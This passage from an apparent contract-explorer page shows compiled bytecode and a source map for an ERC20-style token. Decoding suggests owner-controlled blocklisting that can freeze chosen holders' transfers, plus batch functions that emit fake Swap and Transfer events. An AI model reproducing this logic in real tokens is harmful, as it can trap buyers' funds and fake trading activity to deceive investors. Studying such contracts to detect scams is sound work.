35b6102bb6107dd565b005b6102d760048036038101906102d2919061173a565b6107f1565b005b6102e161095c565b6040516102ee91906117d1565b60405180910390f35b6102ff610985565b60405161030c9190611471565b60405180910390f35b61032f600480360381019061032a919061165b565b610a17565b005b61034b60048036038101906103469190611531565b610a63565b604051610358919061158c565b60405180910390f35b61037b60048036038101906103769190611531565b610ada565b604051610388919061158c565b60405180910390f35b6103ab60048036038101906103a691906117ec565b610afd565b6040516103b891906115b6565b60405180910390f35b6103db60048036038101906103d691906116ed565b610b84565b005b6103f760048036038101906103f2919061165b565b610c31565b005b6060600580546104089061185b565b80601f01602080910402602001604051908101604052809291908181526020018280546104349061185b565b80156104815780601f1061045657610100808354040283529160200191610481565b820191906000526020600020905b81548152906001019060200180831161046457829003601f168201915b5050505050905090565b600080610496610cb5565b90506104a3818585610cbd565b600191505092915050565b6000600454905090565b6000806104c3610cb5565b90506104d0858285610e88565b6104db858585610f14565b60019150509392505050565b60006008905090565b6000806104fb610cb5565b905061051c81858561050d8589610afd565b61051791906118bc565b610cbd565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b61058561118f565b60005b82829050811015610625576000600260008585858181106105ac576105ab611912565b5b90506020020160208101906105c1919061165b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061061d90611941565b915050610588565b505050565b60005b8484905081101561078c5784848281811061064b5761064a611912565b5b9050602002016020810190610660919061165b565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516106c394939291906119cf565b60405180910390a38484828181106106de576106dd611912565b5b90506020020160208101906106f3919061165b565b73ffffffffffffffffffffffffffffffffffffffff16600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161077191906115b6565b60405180910390a3808061078490611941565b91505061062d565b505050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107e561118f565b6107ef600061120d565b565b60005b848490508110156109545784848281811061081257610811611912565b5b9050602002016020810190610827919061165b565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82260008686600060405161088b9493929190611a14565b60405180910390a3600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168585838181106108df576108de611912565b5b90506020020160208101906108f4919061165b565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161093991906115b6565b60405180910390a3808061094c90611941565b9150506107f4565b505050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546109949061185b565b80601f01602080910402602001604051908101604052809291908181526020018280546109c09061185b565b8015610a0d5780601f106109e257610100808354040283529160200191610a0d565b820191906000526020600020905b8154815290600101906020018083116109f057829003601f168201915b5050505050905090565b610a1f61118f565b80600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080610a6e610cb5565b90506000610a7c8286610afd565b905083811015610ac1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab890611acb565b60405180910390fd5b610ace8286868403610cbd565b60019250505092915050565b600080610ae5610cb5565b9050610af2818585610f14565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610b8c61118f565b60005b82829050811015610c2c57600160026000858585818110610bb357610bb2611912565b5b9050602002016020810190610bc8919061165b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610c2490611941565b915050610b8f565b505050565b610c3961118f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610ca9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca090611b5d565b60405180910390fd5b610cb28161120d565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d2d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2490611bef565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610d9d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9490611c81565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e7b91906115b6565b60405180910390a3505050565b6000610e948484610afd565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610f0e5781811015610f00576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef790611ced565b60405180910390fd5b610f0d8484848403610cbd565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f84576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7b90611d7f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ff4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610feb90611e11565b60405180910390fd5b610fff8383836112d1565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611086576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107d90611ea3565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161117691906115b6565b60405180910390a36111898484846113d3565b50505050565b611197610cb5565b73ffffffffffffffffffffffffffffffffffffffff166111b561095c565b73ffffffffffffffffffffffffffffffffffffffff161461120b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161120290611f0f565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806113725750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156113ce5760011515600760009054906101000a900460ff161515146113cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c490611f55565b60405180910390fd5b5b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156114125780820151818401526020810190506113f7565b83811115611421576000848401525b50505050565b6000601f19601f8301169050919050565b6000611443826113d8565b61144d81856113e3565b935061145d8185602086016113f4565b61146681611427565b840191505092915050565b6000602082019050818103600083015261148b8184611438565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006114c88261149d565b9050919050565b6114d8816114bd565b81146114e357600080fd5b50565b6000813590506114f5816114cf565b92915050565b6000819050919050565b61150e816114fb565b811461151957600080fd5b50565b60008135905061152b81611505565b92915050565b6000806040838503121561154857611547611493565b5b6000611556858286016114e6565b92505060206115678582860161151c565b9150509250929050565b60008115159050919050565b61158681611571565b82525050565b60006020820190506115a1600083018461157d565b92915050565b6115b0816114fb565b82525050565b60006020820190506115cb60008301846115a7565b92915050565b6000806000606084860312156115ea576115e9611493565b5b60006115f8868287016114e6565b9350506020611609868287016114e6565b925050604061161a8682870161151c565b9150509250925092565b600060ff82169050919050565b61163a81611624565b82525050565b60006020820190506116556000830184611631565b92915050565b60006020828403121561167157611670611493565b5b600061167f848285016114e6565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126116ad576116ac611688565b5b8235905067ffffffffffffffff8111156116ca576116c961168d565b5b6020830191508360208202830111156116e6576116e5611692565b5b9250929050565b6000806020838503121561170457611703611493565b5b600083013567ffffffffffffffff81111561172257611721611498565b5b61172e85828601611697565b92509250509250929050565b60008060008060006080868803121561175657611755611493565b5b6000611764888289016114e6565b955050602086013567ffffffffffffffff81111561178557611784611498565b5b61179188828901611697565b945094505060406117a48882890161151c565b92505060606117b58882890161151c565b9150509295509295909350565b6117cb816114bd565b82525050565b60006020820190506117e660008301846117c2565b92915050565b6000806040838503121561180357611802611493565b5b6000611811858286016114e6565b9250506020611822858286016114e6565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061187357607f821691505b602082108114156118875761188661182c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006118c7826114fb565b91506118d2836114fb565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156119075761190661188d565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061194c826114fb565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82141561197f5761197e61188d565b5b600182019050919050565b6000819050919050565b6000819050919050565b60006119b96119b46119af8461198a565b611994565b6114fb565b9050919050565b6119c98161199e565b82525050565b60006080820190506119e460008301876115a7565b6119f160208301866119c0565b6119fe60408301856119c0565b611a0b60608301846115a7565b95945050505050565b6000608082019050611a2960008301876119c0565b611a3660208301866115a7565b611a4360408301856115a7565b611a5060608301846119c0565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611ab56025836113e3565b9150611ac082611a59565b604082019050919050565b60006020820190508181036000830152611ae481611aa8565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611b476026836113e3565b9150611b5282611aeb565b604082019050919050565b60006020820190508181036000830152611b7681611b3a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611bd96024836113e3565b9150611be482611b7d565b604082019050919050565b60006020820190508181036000830152611c0881611bcc565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611c6b6022836113e3565b9150611c7682611c0f565b604082019050919050565b60006020820190508181036000830152611c9a81611c5e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611cd7601d836113e3565b9150611ce282611ca1565b602082019050919050565b60006020820190508181036000830152611d0681611cca565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611d696025836113e3565b9150611d7482611d0d565b604082019050919050565b60006020820190508181036000830152611d9881611d5c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611dfb6023836113e3565b9150611e0682611d9f565b604082019050919050565b60006020820190508181036000830152611e2a81611dee565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e8d6026836113e3565b9150611e9882611e31565b604082019050919050565b60006020820190508181036000830152611ebc81611e80565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611ef96020836113e3565b9150611f0482611ec3565b602082019050919050565b60006020820190508181036000830152611f2881611eec565b9050919050565b50565b6000611f3f6000836113e3565b9150611f4a82611f2f565b600082019050919050565b60006020820190508181036000830152611f6e81611f32565b905091905056fea26469706673582212209ab85bd83f12a3419f9fb3619b09707763454fb8da53c04dde18bfa2b669cc0464736f6c63430008090033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad578063a457c2d711610071578063a457c2d714610331578063a9059cbb14610361578063dd62ed3e14610391578063e1268115146103c1578063f2fde38b146103dd5761012c565b8063715018a6146102b357806373ed6b13146102bd5780638da5cb5b146102d957806395d89b41146102f757806397541e9f146103155761012c565b806339509351116100f457806339509351146101eb5780633e5beab91461021b578063477e19441461024b578063618a2f5e1461026757806370a08231146102835761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017f57806323b872dd1461019d578063313ce567146101cd575b600080fd5b6101396103f9565b6040516101469190611471565b60405180910390f35b61016960048036038101906101649190611531565b61048b565b604051610176919061158c565b60405180910390f35b6101876104ae565b60405161019491906115b6565b60405180910390f35b6101b760048036038101906101b291906115d1565b6104b8565b6040516101c4919061158c565b60405180910390f35b6101d56104e7565b6040516101e29190611640565b60405180910390f35b61020560048036038101906102009190611531565b6104f0565b604051610212919061158c565b60405180910390f35b6102356004803603810190610230919061165b565b610527565b604051610242919061158c565b60405180910390f35b610265600480360381019061026091906116ed565b61057d565b005b610281600480360381019061027c919061173a565b61062a565b005b61029d6004803603810190610298919061165b565b610794565b6040516102aa91906115b6565b60405180910390f35b6102bb6107dd565b005b6102d760048036038101906102d2919061173a565b6107f1565b005b6102e161095c565b6040516102ee91906117d1565b60405180910390f35b6102ff610985565b60405161030c9190611471565b60405180910390f35b61032f600480360381019061032a919061165b565b610a17565b005b61034b60048036038101906103469190611531565b610a63565b604051610358919061158c565b60405180910390f35b61037b60048036038101906103769190611531565b610ada565b604051610388919061158c565b60405180910390f35b6103ab60048036038101906103a691906117ec565b610afd565b6040516103b891906115b6565b60405180910390f35b6103db60048036038101906103d691906116ed565b610b84565b005b6103f760048036038101906103f2919061165b565b610c31565b005b6060600580546104089061185b565b80601f01602080910402602001604051908101604052809291908181526020018280546104349061185b565b80156104815780601f1061045657610100808354040283529160200191610481565b820191906000526020600020905b81548152906001019060200180831161046457829003601f168201915b5050505050905090565b600080610496610cb5565b90506104a3818585610cbd565b600191505092915050565b6000600454905090565b6000806104c3610cb5565b90506104d0858285610e88565b6104db858585610f14565b60019150509392505050565b60006008905090565b6000806104fb610cb5565b905061051c81858561050d8589610afd565b61051791906118bc565b610cbd565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b61058561118f565b60005b82829050811015610625576000600260008585858181106105ac576105ab611912565b5b90506020020160208101906105c1919061165b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061061d90611941565b915050610588565b505050565b60005b8484905081101561078c5784848281811061064b5761064a611912565b5b9050602002016020810190610660919061165b565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516106c394939291906119cf565b60405180910390a38484828181106106de576106dd611912565b5b90506020020160208101906106f3919061165b565b73ffffffffffffffffffffffffffffffffffffffff16600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161077191906115b6565b60405180910390a3808061078490611941565b91505061062d565b505050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107e561118f565b6107ef600061120d565b565b60005b848490508110156109545784848281811061081257610811611912565b5b9050602002016020810190610827919061165b565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82260008686600060405161088b9493929190611a14565b60405180910390a3600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168585838181106108df576108de611912565b5b90506020020160208101906108f4919061165b565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161093991906115b6565b60405180910390a3808061094c90611941565b9150506107f4565b505050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546109949061185b565b80601f01602080910402602001604051908101604052809291908181526020018280546109c09061185b565b8015610a0d5780601f106109e257610100808354040283529160200191610a0d565b820191906000526020600020905b8154815290600101906020018083116109f057829003601f168201915b5050505050905090565b610a1f61118f565b80600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080610a6e610cb5565b90506000610a7c8286610afd565b905083811015610ac1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab890611acb565b60405180910390fd5b610ace8286868403610cbd565b60019250505092915050565b600080610ae5610cb5565b9050610af2818585610f14565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610b8c61118f565b60005b82829050811015610c2c57600160026000858585818110610bb357610bb2611912565b5b9050602002016020810190610bc8919061165b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610c2490611941565b915050610b8f565b505050565b610c3961118f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610ca9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca090611b5d565b60405180910390fd5b610cb28161120d565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d2d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2490611bef565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610d9d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9490611c81565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e7b91906115b6565b60405180910390a3505050565b6000610e948484610afd565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610f0e5781811015610f00576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef790611ced565b60405180910390fd5b610f0d8484848403610cbd565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f84576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7b90611d7f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ff4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610feb90611e11565b60405180910390fd5b610fff8383836112d1565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611086576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107d90611ea3565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161117691906115b6565b60405180910390a36111898484846113d3565b50505050565b611197610cb5565b73ffffffffffffffffffffffffffffffffffffffff166111b561095c565b73ffffffffffffffffffffffffffffffffffffffff161461120b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161120290611f0f565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806113725750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156113ce5760011515600760009054906101000a900460ff161515146113cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c490611f55565b60405180910390fd5b5b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156114125780820151818401526020810190506113f7565b83811115611421576000848401525b50505050565b6000601f19601f8301169050919050565b6000611443826113d8565b61144d81856113e3565b935061145d8185602086016113f4565b61146681611427565b840191505092915050565b6000602082019050818103600083015261148b8184611438565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006114c88261149d565b9050919050565b6114d8816114bd565b81146114e357600080fd5b50565b6000813590506114f5816114cf565b92915050565b6000819050919050565b61150e816114fb565b811461151957600080fd5b50565b60008135905061152b81611505565b92915050565b6000806040838503121561154857611547611493565b5b6000611556858286016114e6565b92505060206115678582860161151c565b9150509250929050565b60008115159050919050565b61158681611571565b82525050565b60006020820190506115a1600083018461157d565b92915050565b6115b0816114fb565b82525050565b60006020820190506115cb60008301846115a7565b92915050565b6000806000606084860312156115ea576115e9611493565b5b60006115f8868287016114e6565b9350506020611609868287016114e6565b925050604061161a8682870161151c565b9150509250925092565b600060ff82169050919050565b61163a81611624565b82525050565b60006020820190506116556000830184611631565b92915050565b60006020828403121561167157611670611493565b5b600061167f848285016114e6565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126116ad576116ac611688565b5b8235905067ffffffffffffffff8111156116ca576116c961168d565b5b6020830191508360208202830111156116e6576116e5611692565b5b9250929050565b6000806020838503121561170457611703611493565b5b600083013567ffffffffffffffff81111561172257611721611498565b5b61172e85828601611697565b92509250509250929050565b60008060008060006080868803121561175657611755611493565b5b6000611764888289016114e6565b955050602086013567ffffffffffffffff81111561178557611784611498565b5b61179188828901611697565b945094505060406117a48882890161151c565b92505060606117b58882890161151c565b9150509295509295909350565b6117cb816114bd565b82525050565b60006020820190506117e660008301846117c2565b92915050565b6000806040838503121561180357611802611493565b5b6000611811858286016114e6565b9250506020611822858286016114e6565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061187357607f821691505b602082108114156118875761188661182c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006118c7826114fb565b91506118d2836114fb565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156119075761190661188d565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061194c826114fb565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82141561197f5761197e61188d565b5b600182019050919050565b6000819050919050565b6000819050919050565b60006119b96119b46119af8461198a565b611994565b6114fb565b9050919050565b6119c98161199e565b82525050565b60006080820190506119e460008301876115a7565b6119f160208301866119c0565b6119fe60408301856119c0565b611a0b60608301846115a7565b95945050505050565b6000608082019050611a2960008301876119c0565b611a3660208301866115a7565b611a4360408301856115a7565b611a5060608301846119c0565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611ab56025836113e3565b9150611ac082611a59565b604082019050919050565b60006020820190508181036000830152611ae481611aa8565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611b476026836113e3565b9150611b5282611aeb565b604082019050919050565b60006020820190508181036000830152611b7681611b3a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611bd96024836113e3565b9150611be482611b7d565b604082019050919050565b60006020820190508181036000830152611c0881611bcc565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611c6b6022836113e3565b9150611c7682611c0f565b604082019050919050565b60006020820190508181036000830152611c9a81611c5e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611cd7601d836113e3565b9150611ce282611ca1565b602082019050919050565b60006020820190508181036000830152611d0681611cca565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611d696025836113e3565b9150611d7482611d0d565b604082019050919050565b60006020820190508181036000830152611d9881611d5c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611dfb6023836113e3565b9150611e0682611d9f565b604082019050919050565b60006020820190508181036000830152611e2a81611dee565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e8d6026836113e3565b9150611e9882611e31565b604082019050919050565b60006020820190508181036000830152611ebc81611e80565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611ef96020836113e3565b9150611f0482611ec3565b602082019050919050565b60006020820190508181036000830152611f2881611eec565b9050919050565b50565b6000611f3f6000836113e3565b9150611f4a82611f2f565b600082019050919050565b60006020820190508181036000830152611f6e81611f32565b905091905056fea26469706673582212209ab85bd83f12a3419f9fb3619b09707763454fb8da53c04dde18bfa2b669cc0464736f6c63430008090033

Deployed Bytecode Sourcemap

80:144:4:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2254:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5056:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3867:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5815:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3191:90;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6496:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3702:105;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3494:202;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8922:299;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4031:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2510:101:0;;;:::i;:::-;;9226:300:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1887:85:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2465:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9532:62;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7217:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4352:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4599:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3287:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2760:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2254:98:1;2308:13;2340:5;2333:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;